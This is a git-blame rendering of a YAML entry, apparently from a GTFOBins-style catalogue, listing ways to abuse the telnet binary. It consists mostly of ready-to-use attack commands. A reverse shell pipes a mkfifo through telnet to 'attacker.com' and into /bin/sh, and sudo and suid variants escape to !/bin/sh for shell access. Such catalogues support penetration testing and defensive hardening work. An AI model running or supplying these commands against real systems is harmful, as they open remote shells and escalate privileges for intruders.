2018-05-21 20:14:41 +01:00
|
|
|
---
|
|
|
|
functions:
|
2018-05-25 15:30:02 +02:00
|
|
|
execute-interactive:
|
2018-05-24 20:59:21 +01:00
|
|
|
- description: BSD version only. Needs to be connected first.
|
2018-05-22 21:26:17 +01:00
|
|
|
code: |
|
2018-05-24 20:59:21 +01:00
|
|
|
RHOST=attacker.com
|
|
|
|
RPORT=12345
|
2018-05-21 20:14:41 +01:00
|
|
|
telnet $RHOST $RPORT
|
|
|
|
^]
|
|
|
|
!/bin/sh
|
2018-05-25 15:30:02 +02:00
|
|
|
reverse-shell-interactive:
|
2018-05-24 21:05:07 +01:00
|
|
|
- description: Run `nc -l -p 12345` on the attacker box to receive the shell.
|
2018-05-22 21:22:20 +01:00
|
|
|
code: |
|
2018-05-24 20:59:21 +01:00
|
|
|
RHOST=attacker.com
|
2018-05-23 08:08:13 +01:00
|
|
|
RPORT=12345
|
2018-05-21 20:14:41 +01:00
|
|
|
TF=$(mktemp)
|
|
|
|
rm $TF
|
2018-05-28 17:47:54 +02:00
|
|
|
mkfifo $TF && telnet $RHOST $RPORT 0<$TF | /bin/sh 1>$TF
|
2018-05-21 20:14:41 +01:00
|
|
|
sudo-enabled:
|
2018-05-24 20:59:21 +01:00
|
|
|
- description: BSD version only. Needs to be connected first.
|
2018-05-22 21:26:17 +01:00
|
|
|
code: |
|
2018-05-24 20:59:21 +01:00
|
|
|
RHOST=attacker.com
|
|
|
|
RPORT=12345
|
2018-05-21 20:14:41 +01:00
|
|
|
sudo telnet $RHOST $RPORT
|
|
|
|
^]
|
|
|
|
!/bin/sh
|
|
|
|
suid-limited:
|
2018-05-24 20:59:21 +01:00
|
|
|
- description: BSD version only. Needs to be connected first.
|
2018-05-22 21:26:17 +01:00
|
|
|
code: |
|
2018-05-24 20:59:21 +01:00
|
|
|
RHOST=attacker.com
|
|
|
|
RPORT=12345
|
2018-05-21 20:14:41 +01:00
|
|
|
./telnet $RHOST $RPORT
|
|
|
|
^]
|
|
|
|
!/bin/sh
|
2018-05-25 01:10:39 +02:00
|
|
|
|
2018-05-21 20:14:41 +01:00
|
|
|
---
|